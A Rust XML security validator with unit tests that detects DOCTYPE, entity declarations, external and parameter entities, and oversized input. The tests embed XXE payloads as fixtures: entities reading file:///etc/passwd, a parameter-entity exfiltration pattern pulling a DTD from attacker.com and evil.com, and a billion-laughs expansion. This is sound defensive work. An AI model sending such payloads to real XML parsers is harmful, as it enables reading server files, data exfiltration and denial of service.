use std::error::Error;
use std::fmt;
#[derive(Debug, Clone)]
pub struct XmlSecurityValidator {
pub reject_doctype: bool,
pub max_document_size: usize,
pub strict_validation: bool,
}
impl Default for XmlSecurityValidator {
fn default() -> Self {
Self {
reject_doctype: true,
max_document_size: 10 * 1024 * 1024, strict_validation: true,
}
}
}
impl XmlSecurityValidator {
pub fn new(reject_doctype: bool, max_document_size: usize, strict_validation: bool) -> Self {
Self {
reject_doctype,
max_document_size,
strict_validation,
}
}
pub fn validate(&self, xml: &str) -> Result<(), SecurityViolation> {
if xml.len() > self.max_document_size {
return Err(SecurityViolation::DocumentSizeExceeded {
size: xml.len(),
max_size: self.max_document_size,
});
}
if self.reject_doctype && self.contains_doctype(xml) {
return Err(SecurityViolation::DoctypeDetected);
}
if self.strict_validation {
if self.contains_parameter_entity(xml) {
return Err(SecurityViolation::ParameterEntityDetected);
}
if self.contains_external_entity(xml) {
return Err(SecurityViolation::ExternalEntityDetected);
}
if self.contains_entity_declaration(xml) {
return Err(SecurityViolation::EntityDeclarationDetected);
}
}
Ok(())
}
fn contains_doctype(&self, xml: &str) -> bool {
if !xml.contains("<!") {
return false;
}
let upper = xml.to_uppercase();
upper.contains("<!DOCTYPE")
}
fn contains_external_entity(&self, xml: &str) -> bool {
if !xml.contains("<!") {
return false;
}
let upper = xml.to_uppercase();
if upper.contains("<!ENTITY") {
upper.contains("SYSTEM") || upper.contains("PUBLIC")
} else {
false
}
}
fn contains_entity_declaration(&self, xml: &str) -> bool {
if !xml.contains("<!") {
return false;
}
let upper = xml.to_uppercase();
upper.contains("<!ENTITY")
}
fn contains_parameter_entity(&self, xml: &str) -> bool {
xml.contains("<!ENTITY %")
|| xml.contains("%dtd;")
|| xml.contains("%all;")
|| xml.contains("%file;")
|| xml.contains("%send;")
|| xml.contains("%eval;")
}
}
#[derive(Debug, Clone, PartialEq, Eq)]
pub enum SecurityViolation {
DoctypeDetected,
ExternalEntityDetected,
EntityDeclarationDetected,
ParameterEntityDetected,
DocumentSizeExceeded {
size: usize,
max_size: usize,
},
}
impl fmt::Display for SecurityViolation {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
match self {
Self::DoctypeDetected => write!(
f,
"DOCTYPE declarations are prohibited for security (XXE prevention)"
),
Self::ExternalEntityDetected => write!(
f,
"External entity references (SYSTEM/PUBLIC) are prohibited"
),
Self::EntityDeclarationDetected => write!(
f,
"Entity declarations are prohibited (billion laughs prevention)"
),
Self::ParameterEntityDetected => write!(
f,
"Parameter entities are prohibited (data exfiltration prevention)"
),
Self::DocumentSizeExceeded { size, max_size } => write!(
f,
"Document size ({} bytes) exceeds security limit ({} bytes)",
size, max_size
),
}
}
}
impl Error for SecurityViolation {}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_validator_default() {
let validator = XmlSecurityValidator::default();
assert!(validator.reject_doctype);
assert_eq!(validator.max_document_size, 10 * 1024 * 1024);
assert!(validator.strict_validation);
}
#[test]
fn test_validator_custom() {
let validator = XmlSecurityValidator::new(false, 1024, false);
assert!(!validator.reject_doctype);
assert_eq!(validator.max_document_size, 1024);
assert!(!validator.strict_validation);
}
#[test]
fn test_safe_xml_passes() {
let validator = XmlSecurityValidator::default();
let xml = r#"<?xml version="1.0"?><hedl><data>safe content</data></hedl>"#;
assert!(validator.validate(xml).is_ok());
}
#[test]
fn test_doctype_detection_uppercase() {
let validator = XmlSecurityValidator::default();
let xml = r#"<?xml version="1.0"?>
<!DOCTYPE hedl [<!ENTITY test "value">]>
<hedl><data>test</data></hedl>"#;
let result = validator.validate(xml);
assert!(result.is_err());
assert_eq!(result.unwrap_err(), SecurityViolation::DoctypeDetected);
}
#[test]
fn test_doctype_detection_lowercase() {
let validator = XmlSecurityValidator::default();
let xml = r#"<?xml version="1.0"?>
<!doctype hedl [<!ENTITY test "value">]>
<hedl><data>test</data></hedl>"#;
let result = validator.validate(xml);
assert!(result.is_err());
assert_eq!(result.unwrap_err(), SecurityViolation::DoctypeDetected);
}
#[test]
fn test_doctype_detection_mixed_case() {
let validator = XmlSecurityValidator::default();
let xml = r#"<?xml version="1.0"?>
<!DoCtYpE hedl [<!ENTITY test "value">]>
<hedl><data>test</data></hedl>"#;
let result = validator.validate(xml);
assert!(result.is_err());
assert_eq!(result.unwrap_err(), SecurityViolation::DoctypeDetected);
}
#[test]
fn test_external_entity_system() {
let validator = XmlSecurityValidator::default();
let xml = r#"<?xml version="1.0"?>
<!DOCTYPE hedl [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<hedl><data>&xxe;</data></hedl>"#;
let result = validator.validate(xml);
assert!(result.is_err());
assert_eq!(result.unwrap_err(), SecurityViolation::DoctypeDetected);
}
#[test]
fn test_external_entity_public() {
let validator = XmlSecurityValidator::default();
let xml = r#"<?xml version="1.0"?>
<!DOCTYPE hedl [<!ENTITY xxe PUBLIC "publicId" "http://evil.com/evil.dtd">]>
<hedl><data>&xxe;</data></hedl>"#;
let result = validator.validate(xml);
assert!(result.is_err());
assert_eq!(result.unwrap_err(), SecurityViolation::DoctypeDetected);
}
#[test]
fn test_parameter_entity_attack() {
let validator = XmlSecurityValidator::default();
let xml = r#"<?xml version="1.0"?>
<!DOCTYPE hedl [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<hedl>&send;</hedl>"#;
let result = validator.validate(xml);
assert!(result.is_err());
assert_eq!(result.unwrap_err(), SecurityViolation::DoctypeDetected);
}
#[test]
fn test_billion_laughs_attack() {
let validator = XmlSecurityValidator::default();
let xml = r#"<?xml version="1.0"?>
<!DOCTYPE hedl [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<hedl>&lol3;</hedl>"#;
let result = validator.validate(xml);
assert!(result.is_err());
assert_eq!(result.unwrap_err(), SecurityViolation::DoctypeDetected);
}
#[test]
fn test_document_size_limit() {
let validator = XmlSecurityValidator {
max_document_size: 100,
..Default::default()
};
let large_xml = format!(
r#"<?xml version="1.0"?><hedl><data>{}</data></hedl>"#,
"A".repeat(200)
);
let result = validator.validate(&large_xml);
assert!(result.is_err());
match result.unwrap_err() {
SecurityViolation::DocumentSizeExceeded { size, max_size } => {
assert!(size > 100);
assert_eq!(max_size, 100);
}
_ => panic!("Expected DocumentSizeExceeded"),
}
}
#[test]
fn test_disable_doctype_check() {
let validator = XmlSecurityValidator {
reject_doctype: false,
strict_validation: false,
..Default::default()
};
let xml = r#"<?xml version="1.0"?>
<!DOCTYPE hedl [<!ELEMENT hedl ANY>]>
<hedl><data>test</data></hedl>"#;
assert!(validator.validate(xml).is_ok());
}
#[test]
fn test_strict_validation_entity_detection() {
let validator = XmlSecurityValidator {
reject_doctype: false,
strict_validation: true,
..Default::default()
};
let xml = r#"<?xml version="1.0"?>
<!DOCTYPE hedl [<!ENTITY test "value">]>
<hedl><data>&test;</data></hedl>"#;
let result = validator.validate(xml);
assert!(result.is_err());
assert_eq!(
result.unwrap_err(),
SecurityViolation::EntityDeclarationDetected
);
}
#[test]
fn test_strict_validation_external_entity() {
let validator = XmlSecurityValidator {
reject_doctype: false,
strict_validation: true,
..Default::default()
};
let xml = r#"<?xml version="1.0"?>
<!DOCTYPE hedl [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<hedl><data>&xxe;</data></hedl>"#;
let result = validator.validate(xml);
assert!(result.is_err());
assert_eq!(
result.unwrap_err(),
SecurityViolation::ExternalEntityDetected
);
}
#[test]
fn test_strict_validation_parameter_entity() {
let validator = XmlSecurityValidator {
reject_doctype: false,
strict_validation: true,
..Default::default()
};
let xml = r#"<?xml version="1.0"?>
<!DOCTYPE hedl [<!ENTITY % file SYSTEM "file:///etc/passwd">]>
<hedl><data>test</data></hedl>"#;
let result = validator.validate(xml);
assert!(result.is_err());
assert_eq!(
result.unwrap_err(),
SecurityViolation::ParameterEntityDetected
);
}
#[test]
fn test_comment_with_doctype_string() {
let validator = XmlSecurityValidator::default();
let xml = r#"<?xml version="1.0"?>
<!-- This comment mentions <!DOCTYPE but isn't one -->
<hedl><data>safe</data></hedl>"#;
let result = validator.validate(xml);
assert!(result.is_err());
}
#[test]
fn test_cdata_with_doctype_string() {
let validator = XmlSecurityValidator::default();
let xml = r#"<?xml version="1.0"?>
<hedl><data><![CDATA[<!DOCTYPE test>]]></data></hedl>"#;
let result = validator.validate(xml);
assert!(result.is_err());
}
#[test]
fn test_security_violation_display() {
let violation = SecurityViolation::DoctypeDetected;
assert!(violation.to_string().contains("DOCTYPE"));
assert!(violation.to_string().contains("XXE"));
let violation = SecurityViolation::ExternalEntityDetected;
assert!(violation.to_string().contains("External entity"));
let violation = SecurityViolation::EntityDeclarationDetected;
assert!(violation.to_string().contains("Entity declarations"));
assert!(violation.to_string().contains("billion laughs"));
let violation = SecurityViolation::ParameterEntityDetected;
assert!(violation.to_string().contains("Parameter entities"));
assert!(violation.to_string().contains("exfiltration"));
let violation = SecurityViolation::DocumentSizeExceeded {
size: 1000,
max_size: 500,
};
let msg = violation.to_string();
assert!(msg.contains("1000"));
assert!(msg.contains("500"));
}
#[test]
fn test_empty_xml() {
let validator = XmlSecurityValidator::default();
let xml = "";
assert!(validator.validate(xml).is_ok());
}
#[test]
fn test_xml_declaration_only() {
let validator = XmlSecurityValidator::default();
let xml = r#"<?xml version="1.0"?>"#;
assert!(validator.validate(xml).is_ok());
}
#[test]
fn test_simple_element() {
let validator = XmlSecurityValidator::default();
let xml = r#"<root>test</root>"#;
assert!(validator.validate(xml).is_ok());
}
#[test]
fn test_nested_elements() {
let validator = XmlSecurityValidator::default();
let xml = r#"<?xml version="1.0"?>
<root>
<child1>value1</child1>
<child2>
<nested>value2</nested>
</child2>
</root>"#;
assert!(validator.validate(xml).is_ok());
}
#[test]
fn test_attributes_allowed() {
let validator = XmlSecurityValidator::default();
let xml = r#"<?xml version="1.0"?>
<root attr1="value1" attr2="value2">
<child id="123">content</child>
</root>"#;
assert!(validator.validate(xml).is_ok());
}
#[test]
fn test_unicode_content() {
let validator = XmlSecurityValidator::default();
let xml = r#"<?xml version="1.0" encoding="UTF-8"?>
<root>
<data>Hello δΈη π</data>
</root>"#;
assert!(validator.validate(xml).is_ok());
}
#[test]
fn test_special_characters_escaped() {
let validator = XmlSecurityValidator::default();
let xml = r#"<?xml version="1.0"?>
<root>
<data><tag> & "quoted"</data>
</root>"#;
assert!(validator.validate(xml).is_ok());
}
}